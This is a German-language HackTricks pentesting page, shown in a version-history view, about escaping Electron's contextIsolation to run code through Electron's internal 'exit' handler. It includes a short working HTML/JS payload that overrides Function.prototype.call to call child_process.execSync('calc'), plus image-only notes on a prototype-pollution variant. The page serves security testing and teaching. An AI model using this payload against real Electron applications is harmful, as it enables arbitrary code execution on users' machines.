hacktricks/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md

78 lines
4.6 KiB
Markdown
Raw Normal View History

# Electron contextIsolation RCE über Electron internen Code
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
* Arbeiten Sie in einem **Cybersicherheitsunternehmen**? Möchten Sie Ihr **Unternehmen in HackTricks beworben sehen**? Oder möchten Sie Zugriff auf die **neueste Version des PEASS erhalten oder HackTricks im PDF-Format herunterladen**? Überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
2024-02-10 15:36:32 +00:00
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com)
* **Treten Sie der** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) bei oder der [**Telegram-Gruppe**](https://t.me/peass) oder **folgen** Sie mir auf **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das** [**hacktricks-Repository**](https://github.com/carlospolop/hacktricks) **und das** [**hacktricks-cloud-Repository**](https://github.com/carlospolop/hacktricks-cloud) **einreichen**.
2022-04-28 16:01:33 +00:00
</details>
2024-02-10 15:36:32 +00:00
## Beispiel 1
2022-04-20 12:35:33 +00:00
2024-02-10 15:36:32 +00:00
Beispiel von [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)
2022-04-20 12:35:33 +00:00
Der "exit"-Ereignislistener wird immer vom internen Code festgelegt, wenn das Laden der Seite begonnen wird. Dieses Ereignis wird kurz vor der Navigation ausgelöst:
2022-04-20 12:35:33 +00:00
```javascript
process.on('exit', function (){
2024-02-10 15:36:32 +00:00
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
2022-04-20 12:35:33 +00:00
})
```
{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}
![](<../../../.gitbook/assets/image (1070).png>)
2022-04-20 12:35:33 +00:00
2024-02-10 15:36:32 +00:00
https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- Existiert nicht mehr
2022-04-20 12:35:33 +00:00
2024-02-10 15:36:32 +00:00
Dann geht es hier weiter:
2022-04-20 12:35:33 +00:00
![](<../../../.gitbook/assets/image (793).png>)
2022-04-20 12:35:33 +00:00
Wo "self" das Node-Prozessobjekt ist:
2022-04-20 12:35:33 +00:00
![](<../../../.gitbook/assets/image (700).png>)
2022-04-20 12:35:33 +00:00
Das Prozessobjekt hat eine Referenz zur "require"-Funktion:
2022-04-20 12:35:33 +00:00
```
process.mainModule.require
```
Da der handler.call das process-Objekt erhalten wird, können wir es überschreiben, um beliebigen Code auszuführen:
2022-04-20 12:35:33 +00:00
```html
<script>
Function.prototype.call = function(process){
2024-02-10 15:36:32 +00:00
process.mainModule.require('child_process').execSync('calc');
2022-04-20 12:35:33 +00:00
}
location.reload();//Trigger the "exit" event
</script>
```
2024-02-10 15:36:32 +00:00
## Beispiel 2
2022-04-28 16:01:33 +00:00
Holen Sie sich das **require-Objekt aus der Prototypenverunreinigung**. Von [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
2022-12-03 18:45:54 +00:00
Leak:
2022-04-28 16:01:33 +00:00
<figure><img src="../../../.gitbook/assets/image (279).png" alt=""><figcaption></figcaption></figure>
2022-04-28 16:01:33 +00:00
Ausnutzung:
2022-04-28 16:01:33 +00:00
<figure><img src="../../../.gitbook/assets/image (89).png" alt=""><figcaption></figcaption></figure>
2022-04-28 16:01:33 +00:00
2022-12-03 18:45:54 +00:00
<details>
<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
* Arbeiten Sie in einem **Cybersicherheitsunternehmen**? Möchten Sie Ihr **Unternehmen in HackTricks beworben sehen**? Oder möchten Sie Zugriff auf die **neueste Version des PEASS erhalten oder HackTricks im PDF-Format herunterladen**? Überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
2024-02-10 15:36:32 +00:00
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com)
* **Treten Sie der** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie mir auf **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das** [**HackTricks-Repo**](https://github.com/carlospolop/hacktricks) **und das** [**HackTricks-Cloud-Repo**](https://github.com/carlospolop/hacktricks-cloud) **einreichen**.
2022-04-28 16:01:33 +00:00
</details>